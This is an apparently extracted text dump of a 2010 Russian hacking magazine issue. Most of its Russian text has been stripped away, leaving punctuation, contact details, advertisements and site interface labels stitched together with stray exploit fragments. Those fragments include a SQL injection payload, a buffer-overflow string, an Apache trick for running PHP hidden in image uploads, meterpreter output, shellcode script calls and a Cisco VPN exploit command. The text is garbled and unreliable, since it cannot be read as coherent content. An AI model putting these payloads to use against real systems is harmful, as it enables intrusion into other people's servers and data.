1. , ,
shop.glc.ru.
2. .
3. :
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
C

,
.
, ,
.
DVD

2100 12 +
1200. 6 .
( )

! 8(495)780-88-29
( ) 8(800)200-3-999 ( , ,
). , /

: info@glc.ru

!

72 000 QIWI ()
.
UNITS
HTTP:// WWW2
prostopleer.com
, , -,
, , -, (
), . (
) , -
- . -,
. !
IT-

ping
traceroute
WIPMANIA
www.wipmania.com
, , - -
, justping.com,
( , , ).
: WIPmania .
traceroute, whois DNS.
Firefox, WIPmania API.
IT-EVENT
ALGORITHMATIC
,
, ,
,
IT. IT-Event (, ),
IT- , . , ,
, , !
, ,
, ,
. , ,
Silverlight, . Algorithmatic
, .
it-event.ru
144
Algorithmatic
X 03 /134/ 10

Хакер 2010 03 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2010 03 PDF

Загружено:

Авторское право:

Доступные форматы

.

VEH WINDOWS X64

/ .: (495) 935-7034, : (495) 780-8824

aka segvec aka

: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)

: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)

: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)

: 1XWAN (RJ-45) 10/100 /, 4XLAN (RJ-45) 10/100

: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)

NETGEAR WNR-2000 ( Wi-Fi),

NETGEAR : L2TP, web-.

: 1XWAN (RJ-45) 10/100 /, 4XLAN (RJ-45) 10/100

YOUR CLIENT APPLICATION CODE

GEARMAN CLIENT API

GEARMAN JOB SERVER

GEARMAN WORKER API

$gmclient= new GearmanClient();

COMODO INSTANT MALWARE ANALYSIS

MANDIANT RED CURTAIN

meterpreter > getuid

Program terminated with signal 11, Segmentation fault.

0x41 (A) ebp eip. eip , ,

MySQL Operand should contain 7 column(s).

char stuff[]= AAAAAAAAAAAAAAAAAAAAAAAA\x96\x84\x04\x08;

LIFO (Last In First Out, ),

id=1 and (1,2,3,4,5,6,7) = (select * from users union select

Column id cannot be null.

gcc suid.c -o suid. ( )

AddType application/x-httpd-php .gif

reverse-shell Windows Vista/7

CLIENTLESS VPN SSL

CISCO VPN SSL

BRIEF CISCO VPN SSL CISCO ASA CISCO, . VPN-,

CLIENTLESS CISCO VPN-

echo -n "https://[CISCOVPNSSL]/+CSCO+00";; echo -n $b;

SOLUTION ACL- (webtype/

BRIEF WEB- Microsoft.

./IIS-asp.py <image.jpg> < shellcode>

BRIEF Blender (blender.org) 3D- ,

Text Name (TX:Text.001) TX:myscript. Buttons

TARGETS Blender 2.49b, Blender 2.40, Blender 2.35a, Blender 2.34.

TARGETS Microsoft Internet Information Services (IIS) 5.x/6.x.

BRIEF snoop (docs.sun.com/app/docs/doc/819-2240/snoop1m?a=view) SUN Solaris. Snoop

if (smbdata->flags & SERVER_RESPONSE) {

printf("[*] execute '%s' now ...\n", command);

snprintf(buffer, sizeof(buffer), ";%s;",

while (bytecount > 1)

var x1 = new Array();

HIGH ADRESS TO 0X7FFFFFFF

HIGH ADRESS TO 0X7FFFFFFF

PVOID AtapiDriverObject; //+100

[Sun Nov 15 07:41:42 2009] [error]

64- Windows, SEH, VEH.

VMCB VMRUN 10h

type (1,5,6 7).

CR3 LONG MODE ( 64 !)

, advanced timebased SQL-.

(UserAgent, Referer ..)

: Storm 2008 Brutal

syntax: /autosave value

Storm 2008 Brutal Edition

: ORACLE SECURITY TOOLS

DVD: Caution! Hot content! / , !